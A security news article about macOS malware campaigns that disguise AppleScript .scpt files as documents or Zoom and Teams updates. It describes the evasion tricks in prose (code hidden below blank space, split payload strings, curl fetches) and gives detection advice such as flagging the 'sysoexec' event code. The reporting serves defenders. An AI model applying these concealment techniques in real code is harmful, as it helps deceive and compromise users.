Hackers Abuse AppleScript to Deliver macOS Malware Masquerading as Zoom and Teams Updates

Researchers are tracking an uptick in macOS malware campaigns abusing AppleScript (.scpt) files to deliver stealers and fake update installers disguised as legitimate office documents or Zoom and Microsoft Teams updates.

The technique, once associated with APT operations targeting macOS, is now being repurposed by commodity malware families such as MacSync and Odyssey Stealer.

Following Apple’s August 2024 removal of the “right-click and open” Gatekeeper bypass, threat actors have experimented with new user-interaction methods to execute malicious code.

Traditional infection chains often relied on fake Homebrew installers or DMGs that instructed users to drag items into Terminal. Now, attackers are turning to .scpt AppleScript files to reinstate social engineering-based triggers that evade built-in protections.

Malicious .scpt Files Disguised as Documents and Installers

By default, macOS opens .scpt files in Script Editor.app when you double-click them. Attackers exploit this by embedding innocent-looking comments above long blank spaces, pushing the actual malicious code out of view.

When prompted, victims are encouraged to click the Run button or press Command + R, unknowingly launching payload delivery commands such as “do shell script” or “curl” requests to remote servers.

Recent samples include fake documents like Apeiron_Token_Transfer_Proposal.docx.scpt and Stable1_Investment_Proposal.pptx.scpt, as well as fraudulent update scripts such as Zoom_SDK_Update.scpt, MSTeamsUpdate.scpt, and InstallSoftZone.scpt.

These variants often carry custom icons embedded in the file’s resource fork, making them appear identical to genuine Office files or software installers when unzipped or mounted from a DMG.

Analysis of these samples reveals typical behaviors, such as fetching secondary payloads, executing hidden shell commands, or dropping additional malicious DMGs, such as 888.scpt.

Some obfuscated versions break payload strings into multiple AppleScript variables before reassembling them, mimicking PowerShell-style evasion seen on Windows systems.

Detection and Defense

Malware detection through traditional antivirus software remains inconsistent, with several live samples showing zero detections on VirusTotal.

Security researchers recommend defenders monitor executions launched by Script Editor.app and flag any network activity or process events triggered by AppleScript files. File event logs containing extensions like .docx,  .scpt, or .pptx,  .scpt should be treated as suspicious.

Mitigation steps include changing the default handler for .scpt and .applescript files to non-executable editors such as TextEdit to prevent accidental execution.

Additionally, custom endpoint detection rules can target compiled AppleScript event codes (“sysoexec” for “do shell script”) or track Terminal-related launch anomalies on macOS endpoints.

As macOS threat actors continue to recycle enterprise-grade APT techniques, the rise of AppleScript-based infections signals a growing convergence between scripting abuse and social engineering on Apple systems.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Hackers Abuse AppleScript to Deliver macOS Malware Masquerading as Zoom and Teams Updates appeared first on Cyber Security News.